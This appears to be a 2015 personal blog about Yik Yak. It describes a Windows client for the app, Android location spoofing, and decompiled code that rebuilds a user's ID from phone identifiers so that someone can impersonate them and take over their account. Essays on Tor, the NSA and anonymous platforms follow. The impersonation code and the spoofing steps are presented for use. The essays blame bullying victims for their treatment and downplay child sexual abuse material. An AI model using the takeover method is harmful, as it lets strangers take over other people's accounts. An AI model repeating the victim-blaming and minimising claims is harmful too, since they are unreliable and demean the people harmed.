Monday, March 30, 2015

Windows Yik Yak Client - .Net WPF API

There has been a few Yik Yak clients produced, but it seemed as though most required you to be a developer to utilize them. This knowledge has been rolled up into a Windows client, written in .Net with a WPF interface, utilizing a custom client API. It is written in C# and has a crude user interface. It also supports utilizing a proxy, so Tor can be utilized with the application.

Not all features are supported though. Peek locations are not support, get top yaks for my area, et cetera. Handles are also not supported as of the latest upload. But it does support creating new users, importing existing users, setting a longitude and latitude for these users, posting, commenting and voting. If there is immediate interest in these features that are lacking, then I can add them upon request if there are no developer types utilizing this specific application.

The executable can be downloaded from the following drop box link:

Yik Yak for Windows

There is no map component to this application yet, so the latitude and longitude will need to be acquired by another method, such as the following website:

LatLong.net

If you are the more cautious type and wish to review the source code without disassembling it, there is also a GitHub repository available. The code is currently in the form of a Visual Studio 2013 project. If you do not have Visual Studio 2013, a free version can be downloaded from Microsoft as the following link:

Visual Studio Express 2013 for Windows Desktop

Once the situation with Visual Studio 2013 is squared away, you can download the code from the following page:

Source Code for Yik Yak Windows Client

The API will undoubtedly change, so this application may fall out of sync and cease to function, although backwards compatibility will most likely be reasonable preserved for those who do not update their application (until deprecation decay wears away).


Tuesday, March 24, 2015

Android Yik Yak Attack - Geolocation Spoofing

Yik Yak for Android does not require networks location to be enabled and still works when Allow mock locations is enable, therefore giving way to the ability to spoof your location with applications like Fake Location Spoofer Free. Also, without location throttling, which Yik Yak currently does not seem to implement, you can switch from New York to Los Angeles in an instant and still be able to Yak, Reply and vote.

This does not require root access on the Android device. You must enable Allow mock locations in Developer settings and set the Location mode to Device sensors only (GPS only). While there are applications that do not require these changes to be made, they all most likely require root access.

Android Yik Yak Attack - Impersonating User Identification

Yik Yak for Android uses shared properties of the phone to generate user identities. Therefore, if you can get access to the phone, either through an additional application (think guise or legitimate application with same identity generation scheme) or simply accessing the phone and writing all of the values down, you can impersonate an existing or would be identity for a Yik Yak user by utilizing the following code:

    private static char a[] = "0123456789ABCDEF".toCharArray();

    public final String generateUserIdentification()
    {
        String deviceId = "";
        String simSerialNumber = "";
        String serialNumber = "";
        String wifiMacAddress = "";
        try
        {
            deviceId = ((TelephonyManager)getSystemService(Context.TELEPHONY_SERVICE)).getDeviceId();
        }
        catch (Exception localException1)
        {

        }
        try
        {
            simSerialNumber = ((TelephonyManager)getSystemService(Context.TELEPHONY_SERVICE)).getSimSerialNumber();
        }
        catch (Exception localException2)
        {

        }
        try
        {
            Class localClass = Class.forName("android.os.SystemProperties");
            serialNumber = (String)localClass.getMethod("get", new Class[] { String.class }).invoke(localClass, new Object[] { "ro.serialno" });
        }
        catch (Exception localException3)
        {

        }
        try
        {
            wifiMacAddress = ((WifiManager)getSystemService(Context.WIFI_SERVICE)).getConnectionInfo().getMacAddress();
        }
        catch (Exception localException4)
        {

        }
        String userId = md5HashAndManipulate(deviceId + "." + simSerialNumber + "." + wifiMacAddress + "." + serialNumber);
        if ((checkIfEmpty(deviceId)) || (checkIfEmpty(serialNumber)) || (deviceId.equals("000000000000000")))
        {
            return null;
        }

        return (new StringBuilder()).append(userId.substring(0, 6)).append(userId.substring(5, -1 + userId.length())).toString();
    }

    public static String md5HashAndManipulate(String paramString)
    {
        int i = 0;
        try
        {
            MessageDigest localMessageDigest = MessageDigest.getInstance("MD5");
            byte[] arrayOfByte1 = paramString.getBytes("UTF-8");
            localMessageDigest.update(arrayOfByte1, 0, arrayOfByte1.length);
            byte[] arrayOfByte2 = localMessageDigest.digest();
            char[] arrayOfChar = new char[2 * arrayOfByte2.length];
            while (i < arrayOfByte2.length)
            {
                int j = 0xFF & arrayOfByte2[i];
                arrayOfChar[(i * 2)] = a[(j >>> 4)];
                arrayOfChar[(1 + i * 2)] = a[(j & 0xF)];
                i++;
            }
            String str = new String(arrayOfChar);
            return str;
        }
        catch (NoSuchAlgorithmException localNoSuchAlgorithmException)
        {
            localNoSuchAlgorithmException.printStackTrace();
            return null;
        }
        catch (UnsupportedEncodingException localUnsupportedEncodingException)
        {
            localUnsupportedEncodingException.printStackTrace();
        }
        return null;
    }

    public static boolean checkIfEmpty(String paramString)
    {
        return (paramString == null) || (paramString.trim().length() == 0);
    }


Once the user identity is obtained, the account can be taken over by means described in the Account Takeover section of SilverSky Labs' YikHak exploit (for iPhone), through a Yik Yak API client or spoofing these values on another Android phone (must have root access). A custom Android version of Yik Yak would also work, although it seems as though there is not an existing solution for this avenue. It may be beneficial in providing additional functionality (like Tor integration without root access), but seems to be an unreasonable amount of work for little benefit.

Done successfully, this will give you access to the My Stuff functionality, allowing you to see posted Yaks, Replies, Peeks, voting, et ceterea for the target user.

Yik Yak on Android Does Not Support Privacy By Default

Being that the Android version of Yik Yak does not currently support proxy configurations nor Tor integration through other means, and Orbot, a Tor client for Android, requires root access to enable a transparent proxy, it appears that there is no working Yik Yak over Tor configuration without flashing the phone. This means that, by default, the Internet Protocol Address for the phone is transmitted and logged on  Internet Service Provider and Yik Yak servers with each message that is submitted. This can be used to identify the source phone and perhaps even to provide a means of unauthorized access to the phone, should the database ever be compromised. Additional information may be needed from the carrier if Network Address Translation is being utilized.

In addition, phone confirmation type attacks/verification can be used by default, even when the device is wiped clean; this is unless the IMEI/MEID/ESN is updated, the Subscriber identity module (SIM) is switched out, the ro.serialno value is changed (device serial number) or the mac address for the Wifi is modified. This is because the user identification is based upon a manipulated MD5 hash of these values. Given access to the phone, these values can be verified and a user identification produced, which will match the Yik Yak database if the phone is left unmodified, therefore confirming with almost absolute certainty that the phone was used to submit posts on Yik Yak. These values can be spoofed and/or updated with root access and additional applications on the phone, or simply switching the SIM chip will cause the a different user identification to be computed.

Monday, March 23, 2015

Current State of Anonymity

The inherent functionality of the Internet Protocol/Transmission Control Protocol (IP/TCP) stack, the basis of the modern day internet, reveals the source and destination for each transmission, information which is logged by several parties along the way. Lets use the mail as an example. If the United States Postal Service (USPS) functioned like IP/TCP, one of the methods to send a verified letter would be via a synchronized method. Via this method, a piece of mail would require a to and from address along with a unique identifier. The USPS would deliver the envelope to the recipient, then the recipient would send a letter back to the from address asking if they had sent the letter with the unique identifier. If the recipient receives an acknowledgement stating that they did indeed send the piece of mail, then the recipient opens the letter and begins to communicate. By default, each of these parties logs the communication, with the sender, USPS and the recipient logging the advent of the communication in logs that each party maintains. This makes true anonymity difficult to obtain without additional means. Even when using anonymous platforms, such as Yik Yak or 4chan, if anyone has access to this information, then they can determine identities with varying degrees of certainty (depending on network configuration).

There are several versions of Privacy software that implement additional layers in this process. One of the most notable options is The Onion Router, or Tor. Onion routing has been in development for years, undergoing academic studies, public implementation and funding by the United States Government. In the context of our previous scenario, multiple envelopes are used for a single piece of mail. The sender utilizes four or more envelopes, selecting trusted intermediary parties and filling out the proper to and from addresses for all of these envelopes and enclosing each in a successive envelope. Sending the mail, the USPS delivers the mail to the first address. Once it arrives, the first intermediary opens the first envelope only to reveal another envelope. They then send the mail through the USPS to the second intermediary, which again opens another envelope to reveal yet another envelope. Again it is sent through the USPS, this time to the third intermediary. Once arrived, the third intermediary then opens an envelope to reveal the final destination and sends it on its way. This is termed onion routing because it is similar to peeling pack layers of an onion in communication. The reply in communication is then wrapped in four or more envelopes, reversing the order of the addresses and works its way back to the original sender. This process continues for each communication.

To establish a definite path, a single entity would need to have insight to each one of the locations, and even then, the communication could be coded in manner only understandable to the sender and recipient (termed encryption in the computer science world). There are however many ways to make the identities known. For example, a site could request direct communication outside of the Tor communication line, similar to asking for a direct overnight Fedex complete with a from address, possibly to an additional, and perhaps unauthorized, entity. In computer terms, an attacker could insert code to utilize something like a JavaScript or Flash exploit, sometimes unbeknownst to the person hosting the web site. There are ways around this specific exploit though, such as disabling JavaScript and/or Flash, or forcing all internet traffic through Tor, with an implementation similar to that used by Whonix.

When larger players, such as the National Security Administration (NSA), become interested in Tor users and service providers, things get a bit more interesting and complicated. Setting their Tailored Access Operations unit loose and hosting a large number of Tor related components, they can place wait upon entire sections of the internet to uncover who is sending content where, even without a compromised server. Going back to our previous example, since postage is not a concern for the United States Government, the NSA can learn potential first intermediaries of a sender from records of the USPS and then flood those addresses with fraudulent mail. All intermediary parties have a limited capacity for sorting and tracking this mail, so when they become overburdened, they effectively shutdown, forcing the sender to go else where. This can be done repeatedly until the sender stumbles upon an NSA run intermediary. Although the sender is not forced to send through this intermediary, some do it unwittingly. Tracking traffic through the USPS, they can then identify the common final intermediaries for a target recipient, again effectively shutting down all of these intermediaries and forcing preference to an NSA run intermediary. Having forced preference of use for the first and last intermediaries, the NSA can then use traffic analysis to determine if a sender may be communicating with a recipient. This is similar to tracking the number of days for a sent letter to be received, then tracking the number of days of a reply. Given enough communications, it is only a matter of time before a level of certainty is established for links between senders and recipients. Below is a lolcat from an NSA presentation on their QUANTUM attack suite, although unrelated directly to this specific attack, shows the attitude of the NSA in regards to similar efforts.


The most apparent mitigation scheme in this scenario would to only utilize intermediaries that you trust, although this can become difficult with global efforts sometimes taking place to take down Tor users and services. Some governments and organizations have a track record of rejecting cooperation requests, although this does not necessarily mean that there are not other methods of identifying users and service administrators. Although requests have been made for information on how organizations such as the Federal Bureau of Investigation have come about seizing servers, the developers of Tor remain unsure of exactly how this was done and, without this information, are left only with best guesses.

Although Edward Snowden leaked documents stating that the NSA has made several failed attempts at cracking the core security of Tor, it is apparent that given enough motivation and perhaps a stroke of luck in operational or user configuration errors, that the NSA can identify users and service providers on the Tor network. More than likely, this is the case with all privacy software, with Tor being the more developed and vetted of the choices.

A Case for Anonymity - Upsides of Downsides

Anonymous platforms have become notorious for illegal activity, bullying, terrorism and generally distasteful content. Some early adopters of these technologies have reasons to hide. Others are just looking for a forum without actually identity association. These affinities, while pursued by some considered well within societies acceptable norms, also draw those that are pursuing socially unacceptable behaviors and activities.

To start, criminal activities pervade some new technologies. Printing presses were used to print heretical books and increased censorship. Early digital telephone systems led to the introduction of phreaking. The internet was a breeding ground for criminal activities, including hacking and swapping texts like The Anarchist Cookbook. Cryptocurrencies were known to be utilized by criminals. Tor is used by terrorists, drugs dealers, weapon/human traffickers, et cetera. But all of these technologies either developed into larger and more mainstream technology, or are in the process of doing so.

The latest concern with anonymous geolocation platforms is bullying. But this is not unique to anonymous platforms, as Facebook has proven to be a framework for malicious intent just as much as any other platform (Amanda Todd is a case in point). In most cases which were documented, it seems that bullying was not isolated to one platform or another, but across multiple mediums, including in person.

Verbal or textual bullying is simply an aspect of life, usually in response to socially unacceptable behavior. If rumors or behaviors are completely unfounded, they are usually ignored and quickly dissipate. It is when there is truth to what is said that it is much more harmful. When this does happen, it is better to identify and provide the target with counseling and guidance to orchestrate better actions and approaches to interacting with peers. Attempting to correct each alleged bully is the boil the ocean approach and has proved ineffective. Actual violence is of course another matter, but this can usually be attributed to a single or a few individuals, for which they can be held accountable.

In any case, suicide rates have dropped since the advent of the internet, according to the CDC. If anonymous bullying were truly at cause for an increase in suicides, suicides should have increased during this time instead of decreasing.

Terrorism is another concern with anonymous platforms. Threats are commonly investigated and organizations are forced to hand over all relevant information by means of a subpoena. Sometimes these threats are unsubstantiated and the only goal in mind is to apprehend those that have caused a disruption to society and wasted resources in causing an investigation of the matter. But when substantiated, it is important to prevent or mitigate these actions. Providing a trustworthy forum for people to associate with and vent through draws out information. It is usually the habit of terrorists to reach out to those they identify with before a crime or attack occurs. Drawing out details of these activities before they occur could serve beneficial. When an anonymous platform is compromised, it is less likely to be used as an open forum and therefore further alienates people with antisocial tendencies, which could result in less communication about plans and a narrower surface area that could be cause for alert.

Spreading the word about a potential terrorist attack or crime is also concern. When associated with these types of people, many fear for their life and therefore do not trust given avenues of reporting such behavior. A truly anonymous system for discussing and reporting such activity may alleviate some of these anxieties. Wikileaks has done a good job of this, although it is for reporting events that have already occurred, not potential attacks. It is a trade off not being able to identify sources for possibility gaining more information, but on the flip side, an anonymous forum does not take away from existing efforts. The same is true for most criminal activities.

Another primary concern is that of child pornography. A manifestation of an underlying issue at hand, the culture that it creates may encourage more of the behavior. On the other hand, eliminating the dissemination of the content does not necessarily eliminate the underlying issue. With the development of image processing, it may be possible to identify at exploited minors from pictures/videos and remove them from their environment. The more this technology is developed, the more helpful this material may become in assisting at risk youth. Targeting anonymous platforms more than likely will only drive participants to other means of discovery and distribution. This may make it more difficult to find and identify the subjects in photos and videos. In any case, the interest in collecting and viewing child pornography seems to be minimal.

Secondary concerns of anonymous platforms center around piracy and copyright violations. Organizations usually measure the financial impact of piracy by measuring unit price multiplied by number of copies that were illegally distributed. In reality, most of the people that partake in these activities do not have enough money to make such purchases and would turn to alternative products that cost less, or are free, if the pirated version(s) became unavailable or unusable. In the case of software, this commonly serves as an opportunity to learn the software, sometimes resulting in professional and business use of the software once learned where paid-for copies of the software are utilized. A subscription model for post-box-office movies and television series seem to be popular among would be pirates. The music industry, which has been eroding year after year, almost every year, since 1999, seems that it would benefit little from eliminating piracy, although it may temporarily benefit the advertising industry until budgets are adjusted for effectiveness of campaigns. Books, pictures and other such material do not seem to hold a large presence in the pirating world, with the exceptions of leaks.

With each perceived evil, there are potential benefits. What some term misuses others term as simply uses. Anonymous forums are not of interest to everyone, of little interest to some and of great interest to a few. However, movements such as these have given way to noteworthy disclosures, achievements, and ultimately changes that have altered the course of history. It is an important concept that has enabled nearly unfettered contribution and eventual change.

Risks in Hosting Anonymous Platforms

There have been many hardships for anonymity. Yik Yak experienced push back due to the platform becoming a host for bullying. This lead to the organization implementing geofencing, effectively disabling the application when the location is reported as being a known middle school or high school. The founder of Wikileaks, Julian Assange, has been pent up in the Ecuadorian embassy in London for years after several governments began pursuing Assange (although one aspect is for sexual misconduct, the motivation for pursuing such a charge is questionable). 4chan has become the target of ridicule and attacks such as Distributed Denial of Service (DDoS), although founder Christopher Poole has said that functionality has been implemented at the switching level to ensure users will not undergo further interruption.

Hosting an anonymous platform comes with its own set of difficulties. This is due to the more controversial content being posted about others and the additional pressure placed upon founders and moderators to effectively censure content. History has shown that removed accountability always falls upon someone, even if that someone is simply providing a framework for truly free speech. It either goes one of two ways, with the administrators implementing additional functionality to establish more granular accountability or the administrators taking the heat for content, either in direct fashion or indirectly by circumvented means.

No matter the risks involved in hosting [sometimes pseudo] anonymous platforms, there are those that recognize the value and therefore continue in the quest to provide people with platforms for truly free speech. Supporting these efforts enable more freedom in expression as well as a wider and truer aspect of consumption. While some of the resulting content is outside of social norms and tastes, some flows into mainstream media and provides a path back to the originating forum, perhaps providing a new source of information/entertainment/networking.